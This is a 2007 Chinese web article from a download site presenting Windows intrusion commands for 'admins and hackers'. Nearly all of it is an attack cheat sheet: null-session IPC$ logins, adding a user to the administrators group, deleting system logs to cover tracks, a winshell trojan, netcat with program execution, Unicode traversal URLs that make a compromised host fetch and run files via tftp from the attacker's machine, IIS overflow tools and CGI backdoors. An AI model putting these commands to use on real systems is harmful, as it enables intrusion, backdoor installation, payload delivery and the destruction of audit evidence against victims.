网络软件 | 系统工具 | 应用软件 | 图形图像 | 多媒体类 | 行业软件 | 游戏娱乐 | 源码编程 | 安全相关 | 教育教学 |
业界资讯 | 硬件中心 | 软件应用 | 冲浪宝典 | 操作系统 | 病毒安全 | 互联思考 | 业界新闻 | 风云人物 | 行情导购 | 装机 DIY
 
   
 
您当前的位置: 旗舰下载 -> 冲浪宝典 -> 网管知识 -> 资讯内容 退出登录 用户管理
 
 
· 网页浏览 · 上传下载
· 联络聊天 · 网络应用
· 网管知识
· [图文] 打造另类的Windows操..
· 网上十大经典黑客软件曝光..
· [组图] 任务管理器的五个“..
· [组图] QQ好友不在线也可发..
· 黑客破解常用电脑密码实用..
· 让你的摄像头变成文字扫描..
· 如何在网吧免费上网
· [组图] 网游戏货币任我刷全..
· [组图] 魔兽世界帐号的窃取..
· [组图] 网吧免费行,账号卡..


网络管理员和黑客都应知道的几条命令
日期:2007-4-14 14:10:31  作者:佚名  来源:不详


 
常用的几条net命令: 
(与远程主机建立空管连接) 
net use file://ip/地址\ipc$ "" /use:"" 
(以管理员身份登录远程主机) 
net use file://ip/地址\ipc$ "密码
" /use:"administrator" 
(传送文件到远程主机winnt目录下)copy 本机目录路径\程序
 file://ip/地址\admin$ 
(查看远程主机时间) 
net time file://ip/地址 
(定时启动某个程序)
 at file://ip/地址 02:18 readme.exe 
(查看共享)
 net view file://ip/地址 
(查看netbios工作组列表)
 nbtstat -a ip地址 
(将远程主机c盘映射为自己的f盘)
 net use f: file://ip/地址\c$ 
""/user:"administrator" 
(这两条把自己增加到管理员组)
: net user 用户名 密码 /add 
net localgroup administrators 用户名 /add 
(断开连接) net use file://ip/地址
\ipc$ /delete 
扫尾: 
del c:\winnt\system32\logfiles\*.* 
del c:\winnt\ssytem32\config\*.evt 
del c:\winnt\system32\dtclog\*.* 
del c:\winnt\system32\*.log 
del c:\winnt\system32\*.txt 
del c:\winnt\*.txt 
del c:\winnt\*.log 
一、netsvc.exe 
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: 
netsvc /list file://ip/地址 
netsvc schedule file://ip/
地址 /query 
netsvc file://ip/
地址 schedule /start 
二、opentelnet.exe 
远程启动主机的telnet服务,并绑定端口到7878,例如: 
opentelnet file://ip/地址 用户名 密码 1 7878 
然后就可以telnet到主机的7878端口,进入dos方式下: 
telnet ip地址 7878 三、winshell.exe 
一个非常小的木马(不到6k),telnet到主机的7878端口,输入密码winshell,当看到cmd>后,可打下面的命令: 
p path (查看winshell主程序的路径信息) 
b reboot (重新启动机器) 
d shutdown (关闭机器) 
s shell (执行后你就会看到可爱的“c:\>”) 
x exit (退出本次登录会话,此命令并不终止winshell的运行) 
cmd> http://.../srv.exe ;(通过http下载其他网站上的文件到运行winshell的机器上) 
四、3389登陆器,gui方式登录远程主机的 
五、elsave.exe 
事件日志清除工具 
elsave -s file://ip/
地址 -l "application" -c 
elsave -s file://ip/
地址 -l "system" -c 
elsave -s file://ip/
地址 -l "security" -c 
执行后成功清除应用程序日志,系统日志,安全日志 
六、hbulot.exe 
开启win2kserver和winxp的3389服务 
hbulot [/r] 
使用/r表示安装完成后自动重起目标使设置生效。 
七、nc.exe(netcat.exe) 
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 
想要连接到某处:
 nc [-options] hostname
 port[s] [ports] ... 
绑定端口等待连接:
 nc -l -p port [-options]
 [hostname] [port] 
参数: 
-e prog 程序重定向,一旦连接,就执行 [危险!!] 
-g gateway source-routing
 hop point[s], up to 8 
-g num source-routing
 pointer: 4, 8, 12, ... 
-h 帮助信息 
-i secs 延时的间隔 
-l 监听模式,用于入站连接 
-n 指定数字的ip地址,不能用hostname 
-o file 记录16进制的传输 
-p port 本地端口号 
-r 任意指定本地及远程端口 
-s addr 本地源地址 
-u udp模式 
-v 详细输出??用两个-v可得到更详细的内容 
-w secs timeout的时间 
-z 将输入输出关掉??用于扫描时 八、tftpd32.exe 
把自己的电脑临时变为一台ftp服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用unicode漏洞或telnet到肉鸡,例如: 
http://ip/地址/s cripts/..
%255c..%255c/winnt/system32
/cmd.exe?/c tftp -i 本机ip地址 get 文件名 
c:\winnt\system32\文件名 
然后可以直接令文件运行: 
http://ip/地址/s cripts/..%255c.
.%255c/winnt/system32/cmd.exe?/c+
文件名 九、prihack.exe是iis的printer远程缓冲区溢出工具。 
idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有asp执行权限的目录。然后用ie浏览器连接。 
一、xscan命令行运行参数说明: 
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。 
1.命令格式: xscan -host <起始ip>
[-<终止ip>] <检测项目> [其他选项] 
xscan -file <主机列表文件名> <检测项目> [其他选项] 
其中<检测项目> 含义如下: 
-port : 检测常用服务的端口状态(可通过
\dat\config.ini文件的
"port-scan-options\port-list"项定制待检测端口列表); 
-ftp : 检测ftp弱口令(可通过
\dat\config.ini文件设置用户名/密码字典文件); 
-ntpass : 检测nt-server弱口令
(可通过\dat\config.ini文件设置用户名/密码字典文件); 
-cgi : 检测cgi漏洞(可通过
\dat\config.ini文件的"cgi-encode\encode_type"项设置编码方案); 
-iis : 检测iis漏洞(可通过
\dat\config.ini文件的"cgi-encode\encode_type"项设置编码方案); 
[其他选项] 含义如下: 
-v: 显示详细扫描进度 
-p: 跳过ping不通的主机 
-o: 跳过没有检测到开放端口的主机 
-t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
[]
下一篇资讯:10种常见网管错误
∷相关资讯评论∷    (评论内容只代表网友观点,与本站立场无关!) [更多评论…]



   
· Vista系统隐藏的12个网络工..
· [组图] 利用Windows XP实现..
· [组图] 配置网络 让PPLive播..
· [组图] 用网文快捕“吃尽”..
· [图文] Vista小技巧 快速进..
· [图文] Windows Vista局域网..
· 未更新防毒软件 CNN网络遭..
· [组图] 教你轻松录制在线网..
· [组图] Vista“网络和共享中..
· 提高Linux系统性能加速网络..
 
   
 
关于我们 | 网站帮助 | 广告合作 | 下载声明 | 友情连接 | 网站地图 | 管理登录 |   
鲁ICP备06025774号  Copyright 2005-2008 旗舰下载. All rights reserved. Power By: qjxz.net